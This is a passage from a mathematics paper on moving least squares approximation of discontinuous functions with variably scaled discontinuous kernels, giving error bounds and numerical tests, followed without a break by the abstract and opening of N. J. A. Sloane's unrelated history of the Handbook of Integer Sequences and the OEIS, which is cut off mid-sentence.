that \(\{D^{\boldsymbol{\delta}}\alpha_{i}(\mathbf{x})\}_{1\leq i\leq n}\) forms a _local polynomial reproduction_ in a sense that there exist constants \(h_{0},\ C_{1,\boldsymbol{\delta}},\ C_{2}\) such that for every evaluation point \(\mathbf{x}\) * \(\sum_{i=1}^{N}D^{\boldsymbol{\delta}}\alpha_{i}(\mathbf{x})p(\mathbf{x}_{i})= p(\mathbf{x})\) for all \(p\in\mathbb{P}^{d}_{\ell}\) * \(\sum_{i=1}^{N}|D^{\boldsymbol{\delta}}\alpha_{i}(\mathbf{x})|{\leq}\;C_{1, \boldsymbol{\delta}}h^{-|\boldsymbol{\delta}|}_{X,\Omega}\) * \(D^{\boldsymbol{\delta}}\alpha_{i}(\mathbf{x})=0\) provided that \(\|\mathbf{x}-\mathbf{x}_{i}\|_{2}{\geqslant}\;C_{2}h_{X,\Omega}\) for all \(X\) with \(h_{X,\Omega}\leq h_{0}\). The particular case of \(|\boldsymbol{\delta}|{=}\;0\) was previously discussed in [13, Theorem 4.7] in which it is shown that \(\{\alpha_{i}(\mathbf{x})\}_{1\leq i\leq n}\) forms a local polynomial reproduction. However in this case the basis functions \(\{\alpha_{i}(\cdot)\}_{1\leq i\leq n}\) could be even discontinuous but it is necessary that \(w_{i}(\mathbf{x})\) are bounded (for more details see [13, Chap 3,4]). Consequently we restate the the MLS error bound in Sobolev Spaces developed in [17]. **Theorem 1**.: _[_17_, Theorem 3.12]_ _Suppose that \(\Omega\subset\mathbb{R}^{d}\) is a bounded set with a Lipschitz boundary. Let \(\ell\) be a positive integer, \(0\leq s<1,\ p\in[1,\infty)\,q\in[1,\infty]\) and let \(\boldsymbol{\delta}\) be a multi-index satisfying \(\ell>|\boldsymbol{\delta}|{+}d/p\) for \(p>1\) and \(\ell\geqslant|\boldsymbol{\delta}|{+}d\) for \(p=1\). If \(f\in W^{\ell+s}_{p}(\Omega)\), _there exist constants \(C>0\) and \(h_{0}>0\) such that for all \(X=\{{\bf x}_{1},...,{\bf x}_{N}\}\subset\Omega\) which are quasi-uniform with \(h_{X,\Omega}\leq\min\{h_{0},1\}\), the error estimate holds_ \[\|f-s_{f,X}\|_{W^{|\mathbf{\delta}|}_{q}(\Omega)}\leq Ch_{X,\Omega}^{\ell+s-|\mathbf{ \delta}|-d(1/p-1/q)_{+}}\|f\|_{W^{\ell+s}_{p}(\Omega)}. \tag{11}\] _when the polynomial basis, are shifted to the evaluation point \({\bf x}\) and scaled with respect to the fill distance \(h_{X,\Omega}\), and \(w_{i}(\cdot)\) is positive on \([0,1/2]\), supported in \([0,1]\) such that its even extension is non negative and continuous on \(\mathbb{R}\)._ **Remark 1**.: _The above error bounds holds also when \(s=1\). However, recalling the definition of (semi-)norms in fractional-order Sobolev space, we see that in this case we reach to an integer-order Sobolev space of \(\ell+1\). Therefore, it requires that \(\ell+1>|\mathbf{\delta}|+d/p\) for \(p>1\) or \(\ell+1\geqslant|\mathbf{\delta}|\) for \(p=1\) in order that (11) holds true. The key point is that in this case, the polynomial space is still \(\mathcal{P}^{d}_{\ell}\) and not \(\mathcal{P}^{d}_{\ell+1}\)._ ### Variably Scaled Discontinuous Kernels (VSDKs) Variably Scaled Kernels (VSKs) were firstly introduced in [20]. The basic idea behind them is to map the data sites from \(\mathbb{R}^{d}\) to \(\mathbb{R}^{d+1}\) via a scaling function \(\psi:\Omega\longrightarrow\mathbb{R}\) and to construct an augmented approximation space in which the data sites are \(\{({\bf x}_{i},\psi({\bf x}_{i}))\;i=1,...,N\}\) (see [20, Def. 2.1]). Though the first goal of doing so was getting a _better_ nodes distribution in the augmented dimension, later on in [19] the authors came up with the idea of also encoding the behaviour of the underlying function \(f\) inside the scale function \(\psi\). Precisely, for the target function \(f\) that possesses some jumps, the key idea is the following. **Definition 1**.: _Let \(\mathcal{P}=\{\Omega_{1},...,\Omega_{n}\}\) be a partition of \(\Omega\) and let \(\mathbf{\beta}=(\beta_{1},...,\beta_{n})\) be a vector of real distinct values. Moreover, assume that all the jump discontinuities of the underlying function \(f\) lie on \(\bigcup_{j=1}^{n}\partial\Omega_{j}\). The piecewise constant scaling function \(\psi_{\mathcal{P},\mathbf{\beta}}\) with respect to the partition \(\mathcal{P}\) and the vector \(\mathbf{\beta}\) is defined as_ \[\psi_{\mathcal{P},\mathbf{\beta}}({\bf x})|_{\Omega_{j}}=\beta_{j},\;{\bf x}\in\Omega.\] _Successively, let \(\Phi^{\varepsilon}\) be a positive definite radial kernel on \(\Omega\times\Omega\) that depends on the shape parameter \(\varepsilon>0\). A variably scaled discontinuous kernel on \((\Omega\times\mathbb{R})\times(\Omega\times\mathbb{R})\) is defined as_ \[\Phi^{\varepsilon}_{\psi}({\bf x},{\bf y})=\Phi^{\varepsilon}\big{(}\Psi({\bf x }),\Psi({\bf y})\big{)},\quad{\bf x},{\bf y}\in\Omega. \tag{12}\] _such that \(\Psi({\bf x})=({\bf x},\psi({\bf x}))\)._ Moreover, we point out that if \(\Phi^{\varepsilon}\) is (strictly) positive definite then so is \(\Phi^{\varepsilon}_{\psi}\), and if \(\Phi^{\varepsilon}\) and \(\psi\) are continuous then so is \(\Phi^{\varepsilon}_{\psi}\)[20, Theorem 2.2]. Figure 1 shows two different choices for the discontinuous scale function for the univariate case. In any case, it matters that the discontinuities of the target function \(f\) are assimilated into the kernel \(\Phi^{\varepsilon}_{\Psi}\). ## 3 MLS-VSDKs Let \(f\) be a function with some jump discontinuities defined on \(\Omega\), \(\mathcal{P}\) and \(\psi_{\mathcal{P},\beta}\) as in Definition 1. We look for the MLS approximant with _variably scaled discontinuous weight function_ such that \[w_{\psi}(\mathbf{x},\mathbf{x}_{i})=w(\Psi(\mathbf{x}),\Psi(\mathbf{x}_{i})). \tag{13}\] Above all, we point out that in this case the diagonal matrix \(W(\mathbf{x})\) in (9) still carries only positive values by assumption, and therefore the equation (9) is still solvable meaning that the basis functions \(\alpha(\mathbf{x})\) uniquely exist. However, with new weight functions, from (13) also \(\alpha(\mathbf{x})\) might be continuous or discontinuous regarding to the given data values \(f_{i}\). Therefore our basis functions are indeed data-dependent thanks to (13). From now on, we call this scheme MLS-VSDK, and we will denote the corresponding approximant as \(s^{\psi}_{f,X}\). Since the basis functions are data dependent, one might expect that the space in which we express the error bound should be data dependent as well. Towards this idea, for \(k\in\mathbb{Z},\ 0\leq k\), and \(1\leq p\leq\infty\), we define the _piecewise_ Sobolev Spaces \[\mathcal{W}^{k}_{p}(\Omega)=\{f:\Omega\longrightarrow\mathbb{R}\ \text{s.t.}\ f_{|_{\Omega_{j}}}\in W^{k}_{p}(\Omega_{j}),\quad j\in\{1,...,n \}\},\] where \(f_{|_{\Omega_{j}}}\) denotes the restriction of \(f\) to \(\Omega_{j}\), and \(W^{k}_{p}(\Omega_{j})\) denote the Sobolev space on \(\Omega_{i}\). We endow \(\mathcal{W}^{k}_{p}(\Omega)\) with the norm \[\|f\|_{\mathcal{W}^{k}_{p}(\Omega)}{=\sum_{j=1}^{n}}\|f\|_{W^{k}_{p}(\Omega_{ j})}. \tag{14}\] When \(k=0\) we simply denote \(\mathcal{W}^{0}_{p}(\Omega)\) by \(\mathcal{L}^{p}(\Omega)\). Moreover, it could be shown that for any partition of \(\Omega\) the standard Sobolev space \(W^{k}_{p}(\Omega)\) is contained in \(\mathcal{W}^{k}_{p}(\Omega)\) (see [21] and reference therein). We assume that every set \(\Omega_{j}\in\mathcal{P}\) satisfies Lipschitz boundary conditions which will be essential for our error analysis. **Proposition 1**.: _Let \(\mathcal{P}\) be as in Definition 1 and set the derivative order \(\boldsymbol{\delta}=0\). Then, by using Theorem (1), the error satisfies the inequality_ \[\|f-s^{\psi}_{f,X}\|_{L^{2}(\Omega_{j})}{\leq C_{j}h^{\ell+1-d(1/p-1/2)_{+}}_{ \Omega_{j}}\|f\|_{W^{\ell+1}_{p}(\Omega_{j})}},\qquad\text{for all}\ \,\Omega_{j}\in\mathcal{P} \tag{15}\] Figure 1: Discontinuous scale functions. _with \(h_{\Omega_{j}}\) the fill distance with respect to \(\Omega_{j}\)._ Proof.: Recalling Definition 1 we know that the discontinuities of \(f\) and subsequently \(w_{i}(\cdot)\) are located only at the boundary and not on the domain \(\Omega_{j}\), meaning that \(w_{i}(\cdot)\) is continuous inside \(\Omega_{j}\). Furthermore, the basis \(\{\alpha_{i}(\mathbf{x})\}_{1\leq i\leq n}\) forms a local polynomial reproduction i.e., there exists a constant \(C\) such that \(\sum_{i=1}^{N}\lvert\alpha_{i}\rvert\leq C\). Letting \(s=1\) and \(q=2\), by noticing that \(W^{0}_{q}(\Omega_{j})=L^{q}(\Omega_{j})\), then the error bound (15) is an immediate consequence of Theorem (1). From the above proposition, it could be understood that \(s^{\psi}_{f,X}\) behaves similarly to \(s_{f,X}\) in the domain \(\Omega_{j}\), where there is no discontinuity. This is in agreement with Definition 1. Consequently, it is required to extend the error bound (15) to the whole domain \(\Omega\). **Theorem 2**.: _Let \(f\), \(\mathcal{P}\), \(\psi_{\mathcal{P},\beta}\) be as before, and the weight functions as in (13). Then, for \(\ell>\lvert\delta\rvert+d/p\) (equality also holds for \(p=1\)), and \(f\in\mathcal{W}^{\ell+1}_{p}(\Omega)\), for the MLS-VSDK approximant \(s^{\psi}_{f,X}\) the error can be bounded as follows:_ \[\lVert f-s^{\psi}_{f,X}\rVert_{\mathcal{L}^{2}(\Omega)}\leq Ch^{\ell+1-d(1/p -1/2)_{+}}\lVert f\rVert_{\mathcal{W}^{\ell+1}_{p}(\Omega)} \tag{16}\] Proof.: By Proposition (1), we know that (15) holds for each \(\Omega_{j}\). Let \(h_{X,\Omega_{i}}\) and \(C_{i}\) be the fill distance and a constant associated with each \(\Omega_{i}\), respectively. Then, we have \[\sum_{j=1}^{n}\lVert f-s^{\psi}_{f,X}\rVert_{L^{2}(\Omega_{j})}\leq\sum_{j=1}^ {n}C_{j}h^{\ell+1-d(1/p-1/2)_{+}}_{X,\Omega_{i}}\lVert f\rVert_{W^{\ell+1}_{p }(\Omega_{j})}.\] By definition we get \(\sum_{j=1}^{n}\lVert f-s^{\psi}_{f,X}\rVert_{L^{2}(\Omega_{j})}=\lVert f-s^{ \psi}_{f,X}\rVert_{\mathcal{L}^{2}(\Omega)}\). Moreover, letting \(C=\max\{C_{1},...,C_{n}\}\) and \(h=max\{h_{X,\Omega_{1}},...,h_{X,\Omega_{n}}\}\) then the right hand side can be bounded by \[Ch^{\ell+1-d(1/p-1/2)_{+}}\lVert f\rVert_{\mathcal{W}^{\ell+1}_{p}(\Omega)}.\] Putting these together we conclude. Some remarks are in order. 1. One might notice that the error bound in (11) is indeed local (the basis functions are local by assumption), meaning that if \(f\) is less smooth in a subregion of \(\Omega\), say it possesses only \(\ell^{{}^{\prime}}\leq\ell\) continuous derivatives there, then the approximant (interpolant) has order \(\ell^{{}^{\prime}}+1\) in that region and this is the best we can get. On the other hand according to (16), thanks to the definition of piecewise Sobolev space, the regularity of the underlying function in the interior of the subdomain \(\Omega_{j}\) matters. In other words, as long as \(f\) possesses regularity of order \(\ell\) in subregions, say \(\Omega_{j}\) and \(\Omega_{j+1}\), the approximant order of \(\ell+1\) is achievable, regardless of the discontinuities on the boundary of \(\Omega_{j}\) and \(\Omega_{j+1}\). 2. Another interesting property of the MLS-VSDK scheme is that it is indeed data dependent. To clarify, for the evaluation point \(\mathbf{x}\in\Omega_{j}\) take two data sites \(\mathbf{x}_{i},\;\mathbf{x}_{i+1}\in B(\mathbf{x},r)\) with the same distance from \(\mathbf{x}\) such that \(\mathbf{x}_{i}\in\Omega_{j}\) and \(\mathbf{x}_{i+1}\in\Omega_{j+1}\). Due to the definition (12), \(w_{\psi}(\mathbf{x},\mathbf{x}_{i+1})\) decays to zero faster than \(w_{\psi}(\mathbf{x},\mathbf{x}_{i})\) i.e., the data sites from the same subregion \(\Omega_{j}\) pay more contribution to the approximant (interpolant) \(s_{f,X}^{\psi}\), rather than the one from another subregion \(\Omega_{j+1}\) beyond a discontinuity line MK: is line correct for high dimension?. On the other hand in the classical MLS scheme, this does not happen as the weight function gives the same value to both \(\mathbf{x}_{i}\) and \(\mathbf{x}_{i+1}\). 3. We highlight that in MLS-VSDK scheme we do not scale polynomials and so the polynomial space \(\mathcal{P}_{\ell}^{d}\) is not changed. We scale only the weight functions and thus, in case the given function values bear discontinuities, the basis functions \(\{\alpha_{i}(\cdot)\}_{1\leq i\leq n}\) are modified. We end this section by recalling that the MLS approximation convergence order is achievable only in the _stationary setting_, i.e., the shape parameter \(\varepsilon\) must be scaled with respect to the fill distance. It leads to _peaked basis functions_ for densely spaced data and _flat basis function_ for coarsely spaced data. In other words, the local support of the weight functions \(B(\mathbf{x},r)\), and subsequently basis functions must be tuned with regards to the \(h_{X,\Omega}\) using the shape parameter \(\varepsilon\). Consequently, this holds also in MLS-VSDK scheme, meaning that after scaling \(w_{i}\) we still need to take care of \(\varepsilon\). This is different with respect to VS(D)Ks interpolation where \(\varepsilon=1\) was kept fixed [20, 19]. ## 4 Numerical experiments In this section, we compare the performance of the MLS-VSDK with respect to the classical MLS method. In all numerical tests we fix the polynomials space up to degree 1. Considering the evaluation points as \(Z=\{z_{1},...,z_{s}\}\) we compute root mean square error and maximum error by \[RMSE=\sqrt{\frac{1}{s}\sum_{i=1}^{s}(f(z_{i})-s_{f,X}(z_{i}))^{2}},\quad MAE= \max_{z_{i}\in Z}\lvert f(z_{i})-s_{f,X}(z_{i})\rvert.\] We consider four different weight functions to verify the convergence order of \(s_{f,x}^{\psi}\) to a given \(f\), as presented in Theorem 2. 1. \(w^{1}(\mathbf{x},\mathbf{x}_{i})=(1-\varepsilon\|\mathbf{x}-\mathbf{x}_{i}\| )_{+}^{4}\cdot(4\varepsilon\|\mathbf{x}-\mathbf{x}_{i}\|{+}1)\), which is the well-known \(C^{2}\)_Wendland_ function. Since each \(w_{i}^{1}\) is locally supported on the open ball \(B(0,1)\) then it verifies the conditions required by Theorem (2). 2. \(w^{2}(\mathbf{x},\mathbf{x}_{i})=\exp(-\varepsilon\|\mathbf{x}-\mathbf{x}_{i }\|^{2})\), i.e. the Gaussian RBF. We underline that when Gaussian weight functions are employed, with decreasing separation distance of the approximation centers, the calculation of the basis functions in (9) can be badly conditioned. Therefore, in order to make the computations stable, in this case we regularize the system by adding a small multiple, say \(\lambda=10^{-8}\), of the identity to the diagonal matrix \(W\). 3. \(w^{3}(\mathbf{x},\mathbf{x}_{i})=\exp(-\varepsilon\|\mathbf{x}-\mathbf{x}_{i }\|)(15+15\|\mathbf{x}-\mathbf{x}_{i}\|{+}6\|\mathbf{x}-\mathbf{x}_{i}\|^{2}{+ }\|\mathbf{x}-\mathbf{x}_{i}\|^{3})\), that is a \(C^{6}\)_Matern_ function. 4. \(w^{4}(\mathbf{x},\mathbf{x}_{i})=(\exp\left(\varepsilon\|\mathbf{x}-\mathbf{x} _{i}\|\right)^{2}-1)^{-1}\), suggested in [12], which enjoys an additional feature which leads to interpolatory MLS, since it possesses singularities at the centers. One might notice that \(w^{2}\), \(w^{3}\) and \(w^{4}\) are not locally supported. However, the key point is that they are all decreasing with the distance from the centers and so, in practice, one can overlook the data sites that are so far from the center \(\mathbf{x}\). As a result, one generally considers a _local stencil_ containing \(n\) nearest data sites of the set \(Z\) of evaluation points. While there is no clear theoretical background concerning the stencil size, in MLS literature, one generally lets \(n=2\times Q\) (see e.g [25]). However, it might be possible that in some special cases one could reach a better accuracy using different stencil sizes. This aspect is covered by our numerical tests, which are outlined in the following. 1. In Section 4.1, we present an example in the one-dimensional framework, where the stencil size is fixed to be \(n=2\times Q\). Moreover, we consider \(w^{1}\), \(w^{2}\) and \(w^{3}\). 2. In Section 4.2, we move to the two-dimensional framework and we keep the same stencil size. Here, we restrict the test to the weight function \(w^{1}\) and verify Theorem (2). 3. In Section 4.3, we remain in the two-dimensional setting but the best accuracy is achieved with \(n=20\). Moreover, in addition to \(w^{2}\) and \(w^{3}\), we test the interpolatory case by considering \(w^{4}\) as weight function. 4. In Section 4.4, we present a two-dimensional experiments where the data sites have been perturbed via some white noise. We fix \(n=25\) and \(w^{2},w^{3}\) are involved. ### Example 1 On \(\Omega=(-1,1)\), we assess MLS approximant for \[f_{1}(x)=\begin{cases}e^{-x},&-1<x<-0.5\\ x^{3},&-0.5\leq x<0.5,\\ 1,&0.5\leq x<1\end{cases}\] with discontinuous scale function \[\psi(x)=\begin{cases}1,&x\in(-1,0.5)\text{ and }[0.5,1)\\ 2,&x\in[-0.5,0.5)\,.\end{cases}\] We note that the function \(\psi\) is defined only by two cases. The important fact is that has a jump as \(f_{1}\). To evaluate the approximant consider the evaluation grid of equispaced points with step size \(5.0e-4\). Tables 1 and 2 include RMSE of \(f_{1}\) approximation using \(w^{1}\) as the weight function. Again, in order to investigate the convergence rate, consider two sets of uniform and Halton nodes with the size from Table 1. In order to generalize our results to globally supported weight functions, we take into account \(w^{2}\) and \(w^{3}\), Gaussian and Matern \(C^{6}\) radial functions respectively. For the uniform data sites let the shape parameter values to be \(\boldsymbol{\varepsilon}_{GA}^{U}=[5,20,40,80,160,320]\) and \(\boldsymbol{\varepsilon}_{Mat}^{U}=[5,10,20,40,80,160]\) for \(w^{2}\) and \(w^{3}\). Our computation shows convergence rates of \(2.54\) and \(2.26\) for MLS-VSDK scheme, shown in Figure 2. Accordingly, for _Halton_ points let \(\boldsymbol{\varepsilon}_{Mat}^{H}=[5,10,20,50,200,400]\), \(\boldsymbol{\varepsilon}_{GA}^{H}=[10,20,30,50,100,200]\). The corresponding convergence rates are 2.38 and 2.33. On the other hand, using non-scaled weight functions, the standard MLS scheme can hardly reach an approximation order of 1, in both cases. ### Example 2 Consider on \(\Omega=(-1,1)^{2}\) the discontinuous function \[f_{2}(x,y)=\begin{cases}\exp(-(x^{2}+y^{2})),&x^{2}+y^{2}\leq 0.6\\ x+y,&x^{2}+y^{2}>0.6\end{cases}\] \begin{table} \begin{tabular}{||c|c|c|c||} \hline **number of centers** & \(\varepsilon\) **value** & **RMSE MLS-VSDK** & **RMSE classic MLS** \\ \hline \hline 9 & 0.25 & 3.58e-1 & 3.95e-1 \\ 17 & 0.5 & 1.99e-1 & 3.02e-1 \\ 33 & 1 & 3.10e-3 & 2.17e-1 \\ 65 & 2 & 8.42e-4 & 1.54e-1 \\ 257 & 4 & 5.67e-5 & 7.68e-2 \\ 513 & 8 & 1.43e-5 & 5.35e-2 \\ \hline \end{tabular} \end{table} Table 1: Comparison of the RMSE for \(f_{1}\) approximation at _uniform_ data sites. \begin{table} \begin{tabular}{||c|c|c|c||} \hline **number of centers** & \(\varepsilon\) **value** & **RMSE MLS-VSDK** & **RMSE classic MLS** \\ \hline \hline 9 & 0.25 & 3.53e-1 & 3.77e-1 \\ 17 & 0.5 & 1.99e-1 & 3.01e-1 \\ 33 & 1 & 3.08e-3 & 2.17e-1 \\ 65 & 2 & 8.39e-4 & 1.54e-1 \\ 257 & 4 & 5.67e-5 & 7.73e-2 \\ 513 & 8 & 1.43e-5 & 5.41e-2 \\ \hline \end{tabular} \end{table} Table 2: Comparison of the RMSE for \(f_{1}\) approximation at _Halton_ data sites. Figure 2: Convergence rates for approximating \(f_{1}\) with MLS-VSDK and MLS-Standard schemes using _uniform_ data sites (left) and _Halton_ data sites (right). and the discontinuous scale function \[\psi(x,y)=\begin{cases}1,&x^{2}+y^{2}\leq 0.6\\ 2,&x^{2}+y^{2}>0.6\end{cases}\] As evaluation points, we take the grid of equispaced points with mesh size \(1.00e-2\). Figure 3 shows both the _RMSE_ and _absolute error_ for the classical _MLS_ and _MLS-VSDK_ approximation of \(f_{2}\) sampled from \(1089=33^{2}\) uniform data sites taking \(w^{1}\) as the weight function. Figure 3 shows that using classical MLS, the approximation error significantly increases near the discontinuities, while using MLS-VSDK the approximant can overcome this issue. In order to investigate the convergence rate, we consider increasing sets of \(\{25,81,289,1089,4225,16641\}\) Halton and uniform points as the data sites. To find an appropriate value for the shape parameter, we fix an initial value and we multiply it by a factor of 2 at each step. Thus, let \(\mathbf{\varepsilon}=[0.25,0.5,1,2,4,8]\) be the vector of shape parameter which is modified with respect to the number of the centers in both cases of uniform and Halton data sites. The left plot of Figure 4 shows a convergence rate of 2.58 for the MLS-VSDK and only 0.66 for classical MLS methods, while these values are 2.04 and 0.70 in the right plot. Figure 3: RMSE and abs-error of \(f_{2}\) MLS (left) and MLS-VSDK (right) aproximation schemes using \(w^{1}\) weight function ### Example 3 Consider the following function \[f_{3}(x,y)=\begin{cases}2\big{(}1-\exp(-(y+0.5)^{2})\big{)},&|x|\leq 0.5,\,|y|\leq 0.5. \\ 4(x+0.8),&-0.8\leq x\leq-0.65,|y|\leq 0.8.\\ 0.5,&0.65\leq x\leq 0.8,|y|\leq 0.2\\ 0,&\text{otherwise}.\end{cases}\] defined on \(\Omega=(-1,1)^{2}\). Regarding the discontinuities of \(f_{3}\), the scale function is considered to be \[\psi(x,y)=\begin{cases}1,&|x|\leq 0.5,\,|y|\leq 0.5.\\ 2,&-0.8\leq x\leq-0.65,|y|\leq 0.8.\\ 3,&0.65\leq x\leq 0.8,|y|\leq 0.2\\ 0,&\text{otherwise}.\end{cases}\] Moreover, let the centers and evaluation points be the same as the Example 4.1. Table 3 and 4 shows RMSE of MLS-VSDK and conventional MLS approximation of \(f_{3}\) using \(w^{4}\) which interpolates the data. We underline that our experiments show that the stencil of size \(n=20\) leads to the best accuracy. Figure 5 shows **RMSE** and **Absolute Error** for Figure 4: Convergence rates for approximation of function \(f_{2}\) with MLS-VSDK and MLS standard schemes using _Uniform_ data sites (left) and _Halton_ data sites (right). \begin{table} \begin{tabular}{||c|c|c|c||} \hline **number of centers** & \(\varepsilon\) **value** & **RMSE MLS-VSDK** & **RMSE classic MLS** \\ \hline \hline 25 & 1 & 3.67e-1 & 1.47e+0 \\ 81 & 2 & 3.68e-1 & 8.86e-1 \\ 289 & 4 & 1.49e-2 & 7.44e-1 \\ 1089 & 8 & 4.23e-3 & 7.72e-1 \\ 4225 & 16 & 1.06e-3 & 6.64e-1 \\ 16641 & 32 & 2.65e-4 & 5.25e-1 \\ \hline \end{tabular} \end{table} Table 3: RMSE of \(f_{3}\) interpolation with _uniform_ data sites. _standard MLS_ and _MLS-VSDK approximation_ of \(f_{3}\) sampled from 1089 uniform points using \(w_{4}\) as weight function. Once again, Figure 5 shows how MLS-VSDK scheme can improve the accuracy by reducing the error near the jumps. Eventually, letting \(\mathbf{\varepsilon}_{GA}^{U}=[2,4,8,16,32,64]\) and \(\mathbf{\varepsilon}_{Mat}^{U}=[10,20,40,80,160,320]\), Figure 6 shows that \(h^{2}\) convergence is achievable. To be more precise, the rate of convergence in the left plot is 2.54 and 2.69 for \(w_{2}\) and \(w_{3}\), respectively. On the other hand, letting \(\mathbf{\varepsilon}_{GA}^{H}=[1,2,4,8,16,32]\) and \(\mathbf{\varepsilon}_{Mat}^{H}\) as the Uniform case, convergence rates of 2.50 and 2.73 is achievable when _Halton_ data sites are employed. \begin{table} \begin{tabular}{||c|c|c|c||} \hline **number of centers** & \(\varepsilon\) **value** & **RMSE MLS-VSDK** & **RMSE classic MLS** \\ \hline \hline 25 & 1 & 8.84e-1 & 1.53e+0 \\ 81 & 2 & 8.95e-2 & 1.05e+0 \\ 289 & 4 & 1.42e-2 & 8.74e-1 \\ 1089 & 8 & 4.18e-3 & 6.48e-1 \\ 4225 & 16 & 1.09e-3 & 6.68e-1 \\ 16641 & 32 & 3.02e-4 & 7.07e-1 \\ \hline \end{tabular} \end{table} Table 4: RMSE of \(f_{3}\) interpolation with _Halton_ data sites. Figure 5: RMSE and abs-error of \(f_{3}\) MLS(left) and MLS-VSDK(right) aproximation(interpolation) schemes using \(w^{4}\) weight function ### Example 4 In applications, the discontinuities are likely to be unknown. To overcome this problem, one can consider edge detector method to extract the discontinuities. However, in this way the approximation depends also on the performance of the edge detector method as well [21]. In this direction, in this final experiment the location of the discontinuities are not exact. This is modeled by adding some noise drawn from the standard normal distribution multiplied by \(0.01\) to the edges of \(\Omega_{i}\in\mathcal{P}\). We take the test function \(f_{2}\) and the data sites in Section 4.2. We fix \(n=25\), and \(\mathbf{\varepsilon}_{GA}=[0.25,0.5,1,2,4,8]\), \(\mathbf{\varepsilon}_{Mat}=[1,2,4,816,32]\) for both _Halton_ and _uniform_ centers. Figure 7 shows that the suggested MLS-VSDK is still able to obtain a good convergence rate when compared to classical MLS even when the discontinuities are nor known exactly. Figure 6: Convergence rates for approximation of function \(f_{3}\) with MLS-VSDK and MLS standard schemes using _Uniform_ data sites (left) and _Halton_ data sites (right). Figure 7: Convergence rates for approximation of function \(f_{2}\), based on noisy given data values, with MLS-VSDK and MLS standard schemes using _Uniform_ data sites (left) and _Halton_ data sites (right). Conclusions To approximate a discontinuous function using scattered data values, we studied a new technique based on the use of discontinuously scaled weight functions, that we called the MLS-VSDK scheme, that is the application of discontinuous scaled weight functions to the MLS. It enabled us to move toward a data-dependent scheme, meaning that MLS-VSDK is able to encode the behavior of the underlying function. We obtained a theoretical Sobolev-type error estimate which justifies why MLS-VSDK can outperform conventional MLS. The numerical experiments confirmed the theoretical convergence rates. Besides, our numerical tests showed that the suggested scheme can reach high accuracy even if the position of the data values are slightly perturbed. **Acknowledgments.** This research has been accomplished within the Rete ITaliana di Approsimazione (RITA) and the thematic group on Approximation Theory and Applications of the Italian Mathematical Union. We also received the support of GNCS-IN\(\delta\)AM.
2301.03149
"A Handbook of Integer Sequences" Fifty Years Later
Until 1973 there was no database of integer sequences. Someone coming across the sequence 1, 2, 4, 9, 21, 51, 127,... would have had no way of discovering that it had been studied since 1870 (today these are called the Motzkin numbers, and form entry A001006 in the database). Everything changed in 1973 with the publication of "A Handbook of Integer Sequences", which listed 2372 entries. This report describes the fifty-year evolution of the database from the "Handbook" to its present form as "The On-Line Encyclopedia of Integer Sequences" (or OEIS), which contains 360,000 entries, receives a million visits a day, and has been cited 10,000 times, often with a comment saying "discovered thanks to the OEIS".
N. J. A. Sloane
2023-01-09T02:24:47Z
http://arxiv.org/abs/2301.03149v2
# "A Handbook of Integer Sequences" Fifty Years Later ###### Abstract Until 1973 there was no database of integer sequences. Someone coming across the sequence \(1,2,4,9,21,51,127,\ldots\) would have had no way of discovering that it had been studied since 1870 (today these are called the Motzkin numbers, and form entry A001006 in the database). Everything changed in 1973 with the publication of _A Handbook of Integer Sequences_, which listed 2372 entries. This report describes the fifty-year evolution of the database from the _Handbook_ to its present form as _The On-Line Encyclopedia of Integer Sequences_ (or _OEIS_), which contains \(360,000\) entries, receives a million visits a day, and has been cited \(10,000\) times, often with a comment saying "discovered thanks to the OEIS". ## 1 Introduction Number sequences arise in all branches of science: for example, \(1,1,2,4,9,20,48,115,\ldots\) gives the number of rooted trees with \(n\) nodes (A000081,1 see also Fig. 1), and in daily life: how many pieces can you cut a pancake into with \(n\) knife-cuts? (The pieces need not all be the same size.) That one is easy: \(1,2,4,7,11,16,\ldots\), \(n(n+1)/2+1\) (A000124). But what is the answer for cutting up an (ideal) bagel or doughnut? That is a lot harder: with a sharp knife you might get a few terms, perhaps \(1,2,6,13,\ldots\), but probably not enough to guess the formula, which is \(n(n^{2}+3n+8)/6\) for \(n>0\). For that you would need to to consult the database: go to [https://oeis.org](https://oeis.org) and enter "cutting bagel", or go directly to A003600. Footnote 1: Six-digit numbers prefixed by A refer to entries in the current version of the _Handbook_, _The On-Line Encyclopedia of Integer Sequences_[13]. My fascination with these sequences began in 1964 when I was a graduate student at Cornell University in Ithaca, NY, studying neural networks. I had encountered a sequence of numbers, \(1,8,78,944,13800,\ldots\), and I badly needed a formula for the \(n\)-th term, in order to determine the rate of growth of the terms (this would indicate how long the activity in this very simple neural network would persist). I will say more about this sequence in Section 2.1. I noticed that although several books in the Cornell library contained sequences somewhat similar to mine, as far as I could tell this particular sequence was not mentioned. I expected to have to analyze many related sequences, so in order to keep track of the sequences in these books, I started recording them on \(3"\times 5"\) file cards. The collection grew rapidly as I searched though more books, and once the word got out, people started sending me sequences. Richard Guy was an enthusiastic supporter right from the start. In 1973 I formalized the collection as _A Handbook of Integer Sequences_, which was published by Academic Press (Fig. 2). It contained 2372 entries. Once the book appeared, the flood of correspondence increased, and it took twenty years to prepare the next version. Simon Plouffe helped a great deal, and in 1995 Academic Press published our sequel, _The Encyclopedia of Integer Sequences_, with 5487 entries. From this point on the collection grew even more rapidly. I waited a year, until it had doubled in size, and then put it on the Internet, calling it _The On-Line Encyclopedia of Integer Sequences_. In the rest of this article I will first say more about the evolution of the database: the _Handbook_ (SS2.1), the 1995 _Encyclopedia_ (SS2.2), the _On-Line Encyclopedia_ (SS2.3), and the _OEIS Foundation_ (SS2.4). The next sections describe the database itself: what Figure 1: Left: one of 48 unlabeled rooted trees with 7 nodes (the root node is at the bottom); center: four cuts of a pancake can produce 11 pieces; right: three cuts of a bagel can produce 13 pieces. Figure 2: Front cover of the _Handbook_. The embossed figures show side views of the two ways of folding a strip of three (blank) stamps, and the five ways of folding a strip of four stamps. The full sequence begins \(1,1,2,5,14,38,120,353,1148,3527,\ldots\), A001011. No formula is known. sequences are--or are not--included (SS3.1), how the database is used (SS3.2), the layout of a typical entry (SS3.3), the arrangement of the entries (SS3.4), and a Fact Sheet (SS3.5). The final sections describe some especially interesting sequences: Recaman's sequence (SS4.1), Iteration of number-theoretic functions (SS4.2), Gijswijt's sequence (SS4.3), Lexicographically Earliest Sequences (SS4.4), The Stepping Stones problem (SS4.5), Stained glass windows (SS4.6), and Other sequences I would have liked to include (SS4.7). Several open questions are mentioned to which I would very much like to know the answers. Notation. \(a(n)\) denotes the \(n\)-th term of the sequence under discussion. \(\sigma(n)\) is the sum of the divisors of \(n\) (A000203). ## 2 Evolution of the database ### The _Handbook of Integer Sequences_ Once the collection had grown to a few 